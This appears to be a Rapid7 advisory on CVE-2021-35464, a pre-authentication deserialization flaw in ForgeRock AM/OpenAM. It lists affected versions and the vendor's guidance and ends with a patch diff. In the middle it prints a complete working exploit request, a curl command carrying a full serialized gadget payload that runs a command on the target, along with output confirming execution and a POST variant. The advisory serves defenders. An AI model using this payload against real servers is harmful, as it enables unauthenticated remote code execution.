Threat status: Threat - we now have reliable private reports of exploitation in the wild.
Attacker utility: Remote code execution
Vulnerability class: Deserialization
Description
On Tuesday, June 29, 2021, Portswigger security researcher Michael Stepankin published details on CVE-2021-35464, a pre-authentication remote code execution vulnerability in ForgeRock’s AM identity and access management solution. The vulnerability arises from a Java deserialization flaw in AM’s implementation of the JATO framework and can be triggered by a simple one-line GET or POST request to a vulnerable endpoint. Successful exploitation yields code execution on the target system, and public proofs-of-concept are readily available.
ForgeRock AM versions below 7.0 running on Java 8 are vulnerable and the weakness also exists in unpatched versions of the Open Identify Platform’s OpenAM. ForgeRock/OIP installations running on Java 9 or higher are unaffected.
Affected products
AM 6.0.0.x
AM 6.5.0.x
6.5.1
6.5.2.x
6.5.3
Guidance
According to the guidance in ForgeRock’s advisory, they are “actively working on patches” for existing versions of ForgeRock Access Manager as of June 29, 2021. Organizations must either upgrade to AM version 7 or above or apply one of several workarounds available—see the advisory for details.
Rapid7 analysis
We expect widespread exploitation to occur quickly. As of June 29, 2021, Rapid7 Labs has been able to identify just over 1,000 internet-facing systems that appear to be using ForgeRock’s AM solution. Rapid7 researchers could easily reproduce RCE against OpenAM using a touch /tmp/vulnerable payload:
wvu@kharak:~$ curl -v "http://127.0.0.1:7080/openam/oauth2/..;/ccversion/Version?jato.pageSession=AKztAAVzcgAXamF2YS51dGlsLlByaW9yaXR5UXVldWWU2jC0-z-CsQMAAkkABHNpemVMAApjb21wYXJhdG9ydAAWTGphdmEvdXRpbC9Db21wYXJhdG9yO3hwAAAAAnNyADBvcmcuYXBhY2hlLmNsaWNrLmNvbnRyb2wuQ29sdW1uJENvbHVtbkNvbXBhcmF0b3IAAAAAAAAAAQIAAkkADWFzY2VuZGluZ1NvcnRMAAZjb2x1bW50ACFMb3JnL2FwYWNoZS9jbGljay9jb250cm9sL0NvbHVtbjt4cAAAAAFzcgAfb3JnLmFwYWNoZS5jbGljay5jb250cm9sLkNvbHVtbgAAAAAAAAABAgATWgAIYXV0b2xpbmtaAAplc2NhcGVIdG1sSQAJbWF4TGVuZ3RoTAAKYXR0cmlidXRlc3QAD0xqYXZhL3V0aWwvTWFwO0wACmNvbXBhcmF0b3JxAH4AAUwACWRhdGFDbGFzc3QAEkxqYXZhL2xhbmcvU3RyaW5nO0wACmRhdGFTdHlsZXNxAH4AB0wACWRlY29yYXRvcnQAJExvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvRGVjb3JhdG9yO0wABmZvcm1hdHEAfgAITAALaGVhZGVyQ2xhc3NxAH4ACEwADGhlYWRlclN0eWxlc3EAfgAHTAALaGVhZGVyVGl0bGVxAH4ACEwADW1lc3NhZ2VGb3JtYXR0ABlMamF2YS90ZXh0L01lc3NhZ2VGb3JtYXQ7TAAEbmFtZXEAfgAITAAIcmVuZGVySWR0ABNMamF2YS9sYW5nL0Jvb2xlYW47TAAIc29ydGFibGVxAH4AC0wABXRhYmxldAAgTG9yZy9hcGFjaGUvY2xpY2svY29udHJvbC9UYWJsZTtMAA10aXRsZVByb3BlcnR5cQB-AAhMAAV3aWR0aHEAfgAIeHAAAQAAAABwcHBwcHBwcHBwdAAQb3V0cHV0UHJvcGVydGllc3Bwc3IAHm9yZy5hcGFjaGUuY2xpY2suY29udHJvbC5UYWJsZQAAAAAAAAABAgAXSQAOYmFubmVyUG9zaXRpb25aAAlob3ZlclJvd3NaABdudWxsaWZ5Um93TGlzdE9uRGVzdHJveUkACnBhZ2VOdW1iZXJJAAhwYWdlU2l6ZUkAE3BhZ2luYXRvckF0dGFjaG1lbnRaAAhyZW5kZXJJZEkACHJvd0NvdW50WgAKc2hvd0Jhbm5lcloACHNvcnRhYmxlWgAGc29ydGVkWgAPc29ydGVkQXNjZW5kaW5nTAAHY2FwdGlvbnEAfgAITAAKY29sdW1uTGlzdHQAEExqYXZhL3V0aWwvTGlzdDtMAAdjb2x1bW5zcQB-AAdMAAtjb250cm9sTGlua3QAJUxvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvQWN0aW9uTGluaztMAAtjb250cm9sTGlzdHEAfgAQTAAMZGF0YVByb3ZpZGVydAAsTG9yZy9hcGFjaGUvY2xpY2svZGF0YXByb3ZpZGVyL0RhdGFQcm92aWRlcjtMAAZoZWlnaHRxAH4ACEwACXBhZ2luYXRvcnQAJUxvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvUmVuZGVyYWJsZTtMAAdyb3dMaXN0cQB-ABBMAAxzb3J0ZWRDb2x1bW5xAH4ACEwABXdpZHRocQB-AAh4cgAob3JnLmFwYWNoZS5jbGljay5jb250cm9sLkFic3RyYWN0Q29udHJvbAAAAAAAAAABAgAJTAAOYWN0aW9uTGlzdGVuZXJ0ACFMb3JnL2FwYWNoZS9jbGljay9BY3Rpb25MaXN0ZW5lcjtMAAphdHRyaWJ1dGVzcQB-AAdMAAliZWhhdmlvcnN0AA9MamF2YS91dGlsL1NldDtMAAxoZWFkRWxlbWVudHNxAH4AEEwACGxpc3RlbmVydAASTGphdmEvbGFuZy9PYmplY3Q7TAAObGlzdGVuZXJNZXRob2RxAH4ACEwABG5hbWVxAH4ACEwABnBhcmVudHEAfgAXTAAGc3R5bGVzcQB-AAd4cHBwcHBwcHBwcAAAAAIAAQAAAAAAAAAAAAAAAQAAAAAAAAAAAXBzcgATamF2YS51dGlsLkFycmF5TGlzdHiB0h2Zx2GdAwABSQAEc2l6ZXhwAAAAAHcEAAAAAHhzcgARamF2YS51dGlsLkhhc2hNYXAFB9rBwxZg0QMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAAAdwgAAAAQAAAAAHhwcHBwcHBwcHBwdwQAAAADc3IAOmNvbS5zdW4ub3JnLmFwYWNoZS54YWxhbi5pbnRlcm5hbC54c2x0Yy50cmF4LlRlbXBsYXRlc0ltcGwJV0_BbqyrMwMABkkADV9pbmRlbnROdW1iZXJJAA5fdHJhbnNsZXRJbmRleFsACl9ieXRlY29kZXN0AANbW0JbAAZfY2xhc3N0ABJbTGphdmEvbGFuZy9DbGFzcztMAAVfbmFtZXEAfgAITAARX291dHB1dFByb3BlcnRpZXN0ABZMamF2YS91dGlsL1Byb3BlcnRpZXM7eHAAAAAA_____3VyAANbW0JL_RkVZ2fbNwIAAHhwAAAAAnVyAAJbQqzzF_gGCFTgAgAAeHAAAAaryv66vgAAADIAOQoAAwAiBwA3BwAlBwAmAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBa0gk_OR3e8-AQAGPGluaXQ-AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABNTdHViVHJhbnNsZXRQYXlsb2FkAQAMSW5uZXJDbGFzc2VzAQA1THlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkU3R1YlRyYW5zbGV0UGF5bG9hZDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAJwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAoAQAzeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNsZXRQYXlsb2FkAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAFGphdmEvaW8vU2VyaWFsaXphYmxlAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAfeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cwEACDxjbGluaXQ-AQARamF2YS9sYW5nL1J1bnRpbWUHACoBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7DAAsAC0KACsALgEAFXRvdWNoIC90bXAvdnVsbmVyYWJsZQgAMAEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsMADIAMwoAKwA0AQANU3RhY2tNYXBUYWJsZQEAHnlzb3NlcmlhbC9Qd25lcjU0MzM1MDQzMjg0NTY3MQEAIEx5c29zZXJpYWwvUHduZXI1NDMzNTA0MzI4NDU2NzE7ACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAAEAAEACgALAAEADAAAAC8AAQABAAAABSq3AAGxAAAAAgANAAAABgABAAAALwAOAAAADAABAAAABQAPADgAAAABABMAFAACAAwAAAA_AAAAAwAAAAGxAAAAAgANAAAABgABAAAANAAOAAAAIAADAAAAAQAPADgAAAAAAAEAFQAWAAEAAAABABcAGAACABkAAAAEAAEAGgABABMAGwACAAwAAABJAAAABAAAAAGxAAAAAgANAAAABgABAAAAOAAOAAAAKgAEAAAAAQAPADgAAAAAAAEAFQAWAAEAAAABABwAHQACAAAAAQAeAB8AAwAZAAAABAABABoACAApAAsAAQAMAAAAJAADAAIAAAAPpwADAUy4AC8SMbYANVexAAAAAQA2AAAAAwABAwACACAAAAACACEAEQAAAAoAAQACACMAEAAJdXEAfgAkAAAB1Mr-ur4AAAAyABsKAAMAFQcAFwcAGAcAGQEAEHNlcmlhbFZlcnNpb25VSUQBAAFKAQANQ29uc3RhbnRWYWx1ZQVx5mnuPG1HGAEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQADRm9vAQAMSW5uZXJDbGFzc2VzAQAlTHlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkRm9vOwEAClNvdXJjZUZpbGUBAAxHYWRnZXRzLmphdmEMAAoACwcAGgEAI3lzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkRm9vAQAQamF2YS9sYW5nL09iamVjdAEAFGphdmEvaW8vU2VyaWFsaXphYmxlAQAfeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cwAhAAIAAwABAAQAAQAaAAUABgABAAcAAAACAAgAAQABAAoACwABAAwAAAAvAAEAAQAAAAUqtwABsQAAAAIADQAAAAYAAQAAADwADgAAAAwAAQAAAAUADwASAAAAAgATAAAAAgAUABEAAAAKAAEAAgAWABAACXB0AARQd25ycHcBAHhzcgAUamF2YS5tYXRoLkJpZ0ludGVnZXKM_J8fqTv7HQMABkkACGJpdENvdW50SQAJYml0TGVuZ3RoSQATZmlyc3ROb256ZXJvQnl0ZU51bUkADGxvd2VzdFNldEJpdEkABnNpZ251bVsACW1hZ25pdHVkZXQAAltCeHIAEGphdmEubGFuZy5OdW1iZXKGrJUdC5TgiwIAAHhw_______________-_____gAAAAF1cQB-ACQAAAABAXh4"
* Trying 127.0.0.1...
* TCP_NODELAY set
* Connected to 127.0.0.1 (127.0.0.1) port 7080 (#0)
> GET /openam/oauth2/..;/ccversion/Version?jato.pageSession=AKztAAVzcgAXamF2YS51dGlsLlByaW9yaXR5UXVldWWU2jC0-z-CsQMAAkkABHNpemVMAApjb21wYXJhdG9ydAAWTGphdmEvdXRpbC9Db21wYXJhdG9yO3hwAAAAAnNyADBvcmcuYXBhY2hlLmNsaWNrLmNvbnRyb2wuQ29sdW1uJENvbHVtbkNvbXBhcmF0b3IAAAAAAAAAAQIAAkkADWFzY2VuZGluZ1NvcnRMAAZjb2x1bW50ACFMb3JnL2FwYWNoZS9jbGljay9jb250cm9sL0NvbHVtbjt4cAAAAAFzcgAfb3JnLmFwYWNoZS5jbGljay5jb250cm9sLkNvbHVtbgAAAAAAAAABAgATWgAIYXV0b2xpbmtaAAplc2NhcGVIdG1sSQAJbWF4TGVuZ3RoTAAKYXR0cmlidXRlc3QAD0xqYXZhL3V0aWwvTWFwO0wACmNvbXBhcmF0b3JxAH4AAUwACWRhdGFDbGFzc3QAEkxqYXZhL2xhbmcvU3RyaW5nO0wACmRhdGFTdHlsZXNxAH4AB0wACWRlY29yYXRvcnQAJExvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvRGVjb3JhdG9yO0wABmZvcm1hdHEAfgAITAALaGVhZGVyQ2xhc3NxAH4ACEwADGhlYWRlclN0eWxlc3EAfgAHTAALaGVhZGVyVGl0bGVxAH4ACEwADW1lc3NhZ2VGb3JtYXR0ABlMamF2YS90ZXh0L01lc3NhZ2VGb3JtYXQ7TAAEbmFtZXEAfgAITAAIcmVuZGVySWR0ABNMamF2YS9sYW5nL0Jvb2xlYW47TAAIc29ydGFibGVxAH4AC0wABXRhYmxldAAgTG9yZy9hcGFjaGUvY2xpY2svY29udHJvbC9UYWJsZTtMAA10aXRsZVByb3BlcnR5cQB-AAhMAAV3aWR0aHEAfgAIeHAAAQAAAABwcHBwcHBwcHBwdAAQb3V0cHV0UHJvcGVydGllc3Bwc3IAHm9yZy5hcGFjaGUuY2xpY2suY29udHJvbC5UYWJsZQAAAAAAAAABAgAXSQAOYmFubmVyUG9zaXRpb25aAAlob3ZlclJvd3NaABdudWxsaWZ5Um93TGlzdE9uRGVzdHJveUkACnBhZ2VOdW1iZXJJAAhwYWdlU2l6ZUkAE3BhZ2luYXRvckF0dGFjaG1lbnRaAAhyZW5kZXJJZEkACHJvd0NvdW50WgAKc2hvd0Jhbm5lcloACHNvcnRhYmxlWgAGc29ydGVkWgAPc29ydGVkQXNjZW5kaW5nTAAHY2FwdGlvbnEAfgAITAAKY29sdW1uTGlzdHQAEExqYXZhL3V0aWwvTGlzdDtMAAdjb2x1bW5zcQB-AAdMAAtjb250cm9sTGlua3QAJUxvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvQWN0aW9uTGluaztMAAtjb250cm9sTGlzdHEAfgAQTAAMZGF0YVByb3ZpZGVydAAsTG9yZy9hcGFjaGUvY2xpY2svZGF0YXByb3ZpZGVyL0RhdGFQcm92aWRlcjtMAAZoZWlnaHRxAH4ACEwACXBhZ2luYXRvcnQAJUxvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvUmVuZGVyYWJsZTtMAAdyb3dMaXN0cQB-ABBMAAxzb3J0ZWRDb2x1bW5xAH4ACEwABXdpZHRocQB-AAh4cgAob3JnLmFwYWNoZS5jbGljay5jb250cm9sLkFic3RyYWN0Q29udHJvbAAAAAAAAAABAgAJTAAOYWN0aW9uTGlzdGVuZXJ0ACFMb3JnL2FwYWNoZS9jbGljay9BY3Rpb25MaXN0ZW5lcjtMAAphdHRyaWJ1dGVzcQB-AAdMAAliZWhhdmlvcnN0AA9MamF2YS91dGlsL1NldDtMAAxoZWFkRWxlbWVudHNxAH4AEEwACGxpc3RlbmVydAASTGphdmEvbGFuZy9PYmplY3Q7TAAObGlzdGVuZXJNZXRob2RxAH4ACEwABG5hbWVxAH4ACEwABnBhcmVudHEAfgAXTAAGc3R5bGVzcQB-AAd4cHBwcHBwcHBwcAAAAAIAAQAAAAAAAAAAAAAAAQAAAAAAAAAAAXBzcgATamF2YS51dGlsLkFycmF5TGlzdHiB0h2Zx2GdAwABSQAEc2l6ZXhwAAAAAHcEAAAAAHhzcgARamF2YS51dGlsLkhhc2hNYXAFB9rBwxZg0QMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAAAdwgAAAAQAAAAAHhwcHBwcHBwcHBwdwQAAAADc3IAOmNvbS5zdW4ub3JnLmFwYWNoZS54YWxhbi5pbnRlcm5hbC54c2x0Yy50cmF4LlRlbXBsYXRlc0ltcGwJV0_BbqyrMwMABkkADV9pbmRlbnROdW1iZXJJAA5fdHJhbnNsZXRJbmRleFsACl9ieXRlY29kZXN0AANbW0JbAAZfY2xhc3N0ABJbTGphdmEvbGFuZy9DbGFzcztMAAVfbmFtZXEAfgAITAARX291dHB1dFByb3BlcnRpZXN0ABZMamF2YS91dGlsL1Byb3BlcnRpZXM7eHAAAAAA_____3VyAANbW0JL_RkVZ2fbNwIAAHhwAAAAAnVyAAJbQqzzF_gGCFTgAgAAeHAAAAaryv66vgAAADIAOQoAAwAiBwA3BwAlBwAmAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBa0gk_OR3e8-AQAGPGluaXQ-AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABNTdHViVHJhbnNsZXRQYXlsb2FkAQAMSW5uZXJDbGFzc2VzAQA1THlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkU3R1YlRyYW5zbGV0UGF5bG9hZDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAJwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAoAQAzeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNsZXRQYXlsb2FkAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAFGphdmEvaW8vU2VyaWFsaXphYmxlAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAfeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cwEACDxjbGluaXQ-AQARamF2YS9sYW5nL1J1bnRpbWUHACoBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7DAAsAC0KACsALgEAFXRvdWNoIC90bXAvdnVsbmVyYWJsZQgAMAEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsMADIAMwoAKwA0AQANU3RhY2tNYXBUYWJsZQEAHnlzb3NlcmlhbC9Qd25lcjU0MzM1MDQzMjg0NTY3MQEAIEx5c29zZXJpYWwvUHduZXI1NDMzNTA0MzI4NDU2NzE7ACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAAEAAEACgALAAEADAAAAC8AAQABAAAABSq3AAGxAAAAAgANAAAABgABAAAALwAOAAAADAABAAAABQAPADgAAAABABMAFAACAAwAAAA_AAAAAwAAAAGxAAAAAgANAAAABgABAAAANAAOAAAAIAADAAAAAQAPADgAAAAAAAEAFQAWAAEAAAABABcAGAACABkAAAAEAAEAGgABABMAGwACAAwAAABJAAAABAAAAAGxAAAAAgANAAAABgABAAAAOAAOAAAAKgAEAAAAAQAPADgAAAAAAAEAFQAWAAEAAAABABwAHQACAAAAAQAeAB8AAwAZAAAABAABABoACAApAAsAAQAMAAAAJAADAAIAAAAPpwADAUy4AC8SMbYANVexAAAAAQA2AAAAAwABAwACACAAAAACACEAEQAAAAoAAQACACMAEAAJdXEAfgAkAAAB1Mr-ur4AAAAyABsKAAMAFQcAFwcAGAcAGQEAEHNlcmlhbFZlcnNpb25VSUQBAAFKAQANQ29uc3RhbnRWYWx1ZQVx5mnuPG1HGAEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQADRm9vAQAMSW5uZXJDbGFzc2VzAQAlTHlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkRm9vOwEAClNvdXJjZUZpbGUBAAxHYWRnZXRzLmphdmEMAAoACwcAGgEAI3lzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkRm9vAQAQamF2YS9sYW5nL09iamVjdAEAFGphdmEvaW8vU2VyaWFsaXphYmxlAQAfeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cwAhAAIAAwABAAQAAQAaAAUABgABAAcAAAACAAgAAQABAAoACwABAAwAAAAvAAEAAQAAAAUqtwABsQAAAAIADQAAAAYAAQAAADwADgAAAAwAAQAAAAUADwASAAAAAgATAAAAAgAUABEAAAAKAAEAAgAWABAACXB0AARQd25ycHcBAHhzcgAUamF2YS5tYXRoLkJpZ0ludGVnZXKM_J8fqTv7HQMABkkACGJpdENvdW50SQAJYml0TGVuZ3RoSQATZmlyc3ROb256ZXJvQnl0ZU51bUkADGxvd2VzdFNldEJpdEkABnNpZ251bVsACW1hZ25pdHVkZXQAAltCeHIAEGphdmEubGFuZy5OdW1iZXKGrJUdC5TgiwIAAHhw_______________-_____gAAAAF1cQB-ACQAAAABAXh4 HTTP/1.1
> Host: 127.0.0.1:7080
> User-Agent: curl/7.64.1
> Accept: */*
>
< HTTP/1.1 302
< X-Frame-Options: SAMEORIGIN
< Cache-Control: private
< Location: http://127.0.0.1:7080/openam/base/AMInvalidURL
< Content-Length: 0
< Date: Tue, 29 Jun 2021 15:59:35 GMT
<
* Connection #0 to host 127.0.0.1 left intact
* Closing connection 0
wvu@kharak:~$openam@localhost:/tmp$ ls -l
total 8
drwxr-x--- 2 openam root 4096 Jun 29 15:50 hsperfdata_openam
drwxr-xr-x 1 root root 4096 Jun 17 00:46 hsperfdata_root
-rw-r----- 1 openam root 0 Jun 29 15:59 vulnerable
openam@localhost:/tmp$Sending the payload in a POST request also works:
curl -v "http://127.0.0.1:7080/openam/oauth2/..;/ccversion/Version" -d jato.pageSession=<serialized_object>The ForgeRock AM “patch” (version 7) removes JATO and the legacy endpoints using it:
--- a/WEB-INF/web.xml
+++ b/WEB-INF/web.xml
@@ -45,88 +45,6 @@
<listener-class>org.forgerock.openam.identity.idm.AMIdentityRepositoryListenerInitializer</listener-class>
</listener>
- <!-- context param -->
- <context-param>
- <param-name>jato:enforceStrictSessionTimeout</param-name>
- <param-value>true</param-value>
- </context-param>
- <context-param>
- <param-name>jato:com.sun.identity.authentication.UI.*:moduleURL</param-name>
- <param-value>../UI</param-value>
- </context-param>
- <context-param>
- <param-name>jato:enforceStrictSessionTimeout1</param-name>
- <param-value>true</param-value>
- </context-param>
-
- <!-- Console context params -->
- <context-param>
- <param-name>jato:com.sun.identity.console.base.*:moduleURL</param-name>
- <param-value>../base</param-value>
- </context-param>
- <context-param>
- <param-name>jato:com.sun.identity.console.authentication.*:moduleURL</param-name>
- <param-value>../authentication</param-value>
- </context-param>
- <context-param>
- <param-name>jato:com.sun.identity.console.service.*:moduleURL</param-name>
- <param-value>../service</param-value>
- </context-param>
- <context-param>
- <param-name>jato:com.sun.identity.console.session.*:moduleURL</param-name>
- <param-value>../session</param-value>
- </context-param>
- <context-param>
- <param-name>jato:com.sun.identity.console.realm.*:moduleURL</param-name>
- <param-value>../realm</param-value>
- </context-param>
- <context-param>
- <param-name>jato:com.sun.identity.console.policy.*:moduleURL</param-name>
- <param-value>../policy</param-value>
- </context-param>
- <context-param>
- <param-name>jato:com.sun.identity.console.idm.*:moduleURL</param-name>
- <param-value>../idm</param-value>
- </context-param>
- <context-param>
- <param-name>jato:com.sun.identity.console.user.*:moduleURL</param-name>
- <param-value>../user</param-value>
- </context-param>
- <context-param>
- <param-name>jato:com.sun.identity.console.delegation.*:moduleURL</param-name>
- <param-value>../delegation</param-value>
- </context-param>
- <context-param>
- <param-name>jato:com.sun.identity.console.agentconfig.*:moduleURL</param-name>
- <param-value>../agentconfig</param-value>
- </context-param>
- <context-param>
- <param-name>jato:com.sun.identity.console.task.*:moduleURL</param-name>
- <param-value>../task</param-value>
- </context-param>
- <context-param>
- <param-name>jato:com.sun.identity.console.version.*:moduleURL</param-name>
- <param-value>../ccversion</param-value>
- </context-param>
- <context-param>
- <param-name>jato:com.sun.identity.console.federation.*:moduleURL</param-name>
- <param-value>../federation</param-value>
- </context-param>
- <context-param>
- <param-name>jato:com.sun.identity.console.webservices.*:moduleURL</param-name>
- <param-value>../webservices</param-value>
- </context-param>
- <context-param>
- <param-name>jato:com.sun.identity.console.sts.*:moduleURL</param-name>
- <param-value>../sts</param-value>
- </context-param>
- <context-param>
- <param-name>jato:com.sun.identity.console.audit.*:moduleURL</param-name>
- <param-value>../audit</param-value>
- </context-param>
-
- <!-- end console context param -->
-
<filter>
<filter-name>amSetupFilter</filter-name>
<filter-class>com.sun.identity.setup.AMSetupFilter</filter-class>
@@ -141,6 +59,16 @@
<param-value>Server</param-value>
</init-param>
</filter>
+ <filter>
+ <filter-name>SecureCookieFilter</filter-name>
+ <filter-class>org.forgerock.openam.headers.SecureCookieFilter</filter-class>
+ <async-supported>true</async-supported>
+ <init-param>
+ <!-- Add any cookies that should be excluded from upgrade to secure cookies here -->
+ <param-name>excludes</param-name>
+ <param-value></param-value>
+ </init-param>
+ </filter>
<!--
To override the default User-Agent exclusion patterns for SameSite=none cookies, uncomment
the following filter definition and update the excluded patterns, one pattern per line -->
@@ -191,6 +119,18 @@
<param-value>nosniff</param-value>
</init-param>
</filter>
+ <filter>
+ <filter-name>CachePrivate</filter-name>
+ <filter-class>org.forgerock.openam.headers.SetHeadersFilter</filter-class>
+ <init-param>
+ <param-name>Cache-Control</param-name>
+ <param-value>private</param-value>
+ </init-param>
+ <init-param>
+ <param-name>excludes</param-name>
+ <param-value>/serverinfo/*,/serverinfo/version,/serverinfo/cookieDomains</param-value>
+ </init-param>
+ </filter>
<filter>
<filter-name>CacheForFiveMinutes</filter-name>
<filter-class>org.forgerock.openam.headers.SetHeadersFilter</filter-class>
@@ -210,73 +150,9 @@
</init-param>
<init-param>
<param-name>excludes</param-name>
- <param-value>/policyEditor/,/policyEditor/index.html,/scripts/,/scripts/index.html,/XUI/,/XUI/index.html</param-value>
+ <param-value>/XUI/,/XUI/index.html,/ui-admin/,/ui-admin/index.html</param-value>
</init-param>
</filter>
- <!-- To configure CORS Support, please see the documentation and use the following lines as a template.
- <filter>
- <filter-name>CORSFilter</filter-name>
- <filter-class>org.forgerock.openam.cors.CORSFilter</filter-class>
- <init-param>
- <description>
- Accepted Methods (Required):
- A comma separated list of HTTP methods for which to accept CORS requests.
- </description>
- <param-name>methods</param-name>
- <param-value>POST,PUT</param-value>
- </init-param>
- <init-param>
- <description>
- Accepted Origins (Required):
- A comma separated list of origins from which to accept CORS requests.
- </description>
- <param-name>origins</param-name>
- <param-value>http://www.example.net,https://example.org:8433</param-value>
- </init-param>
- <init-param>
- <description>
- Allow Credentials (Optional):
- Whether to include the Vary (Origin) and Access-Control-Allow-Credentials headers in the response.
- Default: false
- </description>
- <param-name>allowCredentials</param-name>
- <param-value>false</param-value>
- </init-param>
- <init-param>
- <description>
- Allowed Headers (Optional):
- A comma separated list of HTTP headers which can be included in the requests.
- </description>
- <param-name>headers</param-name>
- <param-value>headerOne,headerTwo,headerThree</param-value>
- </init-param>
- <init-param>
- <description>
- Expected Hostname (Optional):
- The name of the host expected in the request Host header.
- </description>
- <param-name>expectedHostname</param-name>
- <param-value>openam.example.com:8080</param-value>
- </init-param>
- <init-param>
- <description>
- Exposed Headers (Optional):
- The comma separated list of headers which the user-agent can expose to its CORS client.
- </description>
